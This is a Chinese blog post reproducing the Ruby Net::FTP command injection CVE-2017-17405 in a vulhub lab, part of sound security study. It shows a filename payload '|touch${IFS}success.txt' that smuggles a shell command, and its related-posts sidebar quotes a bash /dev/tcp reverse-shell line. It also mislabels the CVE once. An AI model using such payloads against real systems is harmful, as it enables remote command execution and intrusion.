CVE-2017-17405漏洞复现

最新推荐文章于 2024-06-01 21:43:54 发布
最新推荐文章于 2024-06-01 21:43:54 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 渗透测试 安全漏洞 文章标签: 渗透测试 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/113806917
版权

一、漏洞简述

Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

Net::FTP#get、getbinaryfile、gettextfile、put、putbinaryfile和puttextfile使用Kernel#open打开本地文件。如果localfile参数以管道字符“|”开头,则执行管道字符后面的命令。localfile的默认值是文件.basename(remotefile),因此恶意的FTP服务器可能导致任意命令执行。

影响版本:

Ruby 2.2系列:2.2.8及更早版本

Ruby 2.3系列:2.3.5及更早版本

Ruby 2.4系列:2.4.2及更早版本

Ruby 2.5系列:2.5.0-preview1

在主干修订版r61242之前

修复:

Ruby团队只是用File.open函数替换了open函数,而File.open函数不容易受到命令注入的影响。

二、漏洞复现

本操作使用kali 机为攻击机,ip为192.168.187.134

ubuntu上使用 vulhub为靶机,ip为192.168.187.133

 

在kali机上 打开docker

service docker start

 

在ubuntu 上加载CVE-2017-14015漏洞环境

cd /vulhub-master/ruby/CVE-2017-17405

docker-compose build

docker-compose up -d

在kali运行一个可以访问到FTP客户端。可以使用python运行pyftpdlib,如果没有就可以按照下面的步骤安装使用环境

#安装pyftplid

pip install pyftpdlib

#在当前目录下使用python生成一个ftp服务器,默认监听在0.0.0.0:2121端口。

python -m pyftpdlib -p 2121 -i 0.0.0.0

 

开始利用漏洞。注入命令|touch${IFS}success.txt(空格用${IFS}代替),发送如下数据包即可。

然后在浏览器中会提出文件下载, 保存下载文件

 

在kali中 查看FTP服务器出现的访问记录

然后在ubuntu靶机中运行命令

docker ps -a

进入docker容器,依次执行下列命令,查看已经被保存的success.txt文件

参考链接

https://blog.csdn.net/weixin_44253823/article/details/102917806

HEAVM
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-17405(Ruby Net::FTP 模块命令注入漏洞复现
kriesa的博客
07-13 1195
CVE-2017-17405复现
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
Ruby NetFTP 模块命令注入漏洞CVE-2017-17405
黑白的博客
12-14 1005
声明 好好学习,天天向上 漏洞描述 Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 影响范围 Ruby 2.2系列:2.2.8及更早版本 Ruby 2.3系列:2.3.5及更早版本 Ruby 2.4系列:2.4.2及更早版本 Ruby 2.5系列:2.5.0-preview1 在主干修订版r61242之前 复现
CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
最新发布
IronmanJay的博客
06-01 2661
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
Ruby Net::FTP 模块命令注入漏洞CVE-2017-17405
EC_Carrot的博客
07-26 392
漏洞简介 Net::FTP是其中的一个FTP客户端的实现。 Ruby 2.4.3之前的版本中的Net::FTP存在命令注入漏洞。在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 漏洞复现 访问http://your-ip:8080/将可以看到一个HTTP服务,其作用是,假如我们访问http://your-ip:8080/download?uri=ftp://examp
【春秋云镜】Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)
weixin_44632654的博客
10-17 255
2.4.3之前的Ruby允许Net :: FTP命令注入。
春秋云境CVE-2017-17405
shr592833253的博客
05-07 260
bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode,最后带入payload对应的位置。复现漏洞需要我们自己起一个ftp服务,这里推荐用python的pyftpdlib,没有安装的小伙伴,可以现在自己的vps上安装一下。burpsuit重放一下请求包,vps成功反弹出shell,拿到flag!值得注意的是,得关注自己的vps有没有开启2121这个端口。,然后再进行urlencode编码,也就是,随后我们进入靶场,发现如下界面。
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
Ruby NetFTP模块命令注入(CVE-2017-17405)
m0_65150886的博客
01-16 701
Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没有过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。在Ruby 2.2系列的2.2.8及更早版本、Ruby 2.3系列的2.3.5及更早版本、Ruby 2.4系列的2.4.2及更早版本、Ruby 2.5系列的2.5.0-preview1以及在主干修订版r61242之前都存在该漏洞
Ruby Net::FTP 模块命令注入漏洞CVE-2017-17405漏洞复现
weixin_51804748的博客
01-17 1989
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
CVE-2017-17215复现,主要是解决qemu和主机连接问题,后续会继续深入分析该漏洞文件
darui_csdn的博客
08-08 586
一、基本信息: 定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用可能导致远程执行任意代码。该漏洞payload由蜜罐所捕获发现。利用原理是利用upnp服务中的注入漏洞实现任意命令执行。 二、配置复现环境: 1. 安装qemu sudo apt-get install qemu sudo apt-get install qemu-user-static sudo apt-get install qemu-system 2. 网
[漏洞复现]CVE-2017-17010
Vicl1fe的博客
12-19 1481
环境 攻击机:kali2019.04 靶机:windows 7 攻击机IP:192.168.34.80 靶机IP:192.168.34.81 漏洞复现
CVE-2017-15715(Apache解析漏洞)
u014794539的博客
07-25 1021
Apache换行解析漏洞 影响版本:Apache 2.4.0~2.4.29 影响说明:绕过服务器策略,上传webshell 环境说明:PHP5.5 、 Apache2.4.10 漏洞复现利用如下 打开环境即是个文件上传点 先上潮汐看 Apache 百度搜一波 我们利用CVE-2017-15715(Apache换行解析漏洞) 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3491
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
CVE-2017-15715Apache 换行解析漏洞复现
七堇年的博客
03-24 3922
CVE-2017-15715Apache 换行解析漏洞复现
CVE-2017-7504
07-28
CVE-2017-7504是指JBoss AS 4.x及之前版本中的一个反序列化漏洞,该漏洞存在于JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中。攻击者可以利用特制的序列化数据利用该漏洞执行任意代码。与CVE-2015-7501漏洞原理相似,但利用的路径不同,CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下。\[1\] 要利用CVE-2017-7504漏洞,可以按照以下步骤进行操作: 1. 访问靶场环境。 2. 使用CVE-2017-12149的工具和脚本在攻击机上执行命令,生成poc(详情请参考相关文章)\[2\]。 3. 在另一个终端上监听端口。 4. 在第一个终端上执行命令,生成成功\[3\]。 请注意,这只是一种利用CVE-2017-7504漏洞的方法,具体操作可能因环境和工具而异。 #### 引用[.reference_title] - *1* [JBossMQ JMS 反序列化漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_51151498/article/details/128283378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[Vulfocus解题系列] jboss 反序列化 (CVE-2017-7504)](https://blog.csdn.net/qq_45813980/article/details/118653639)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [JBoss反序列漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_46411728/article/details/126714312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值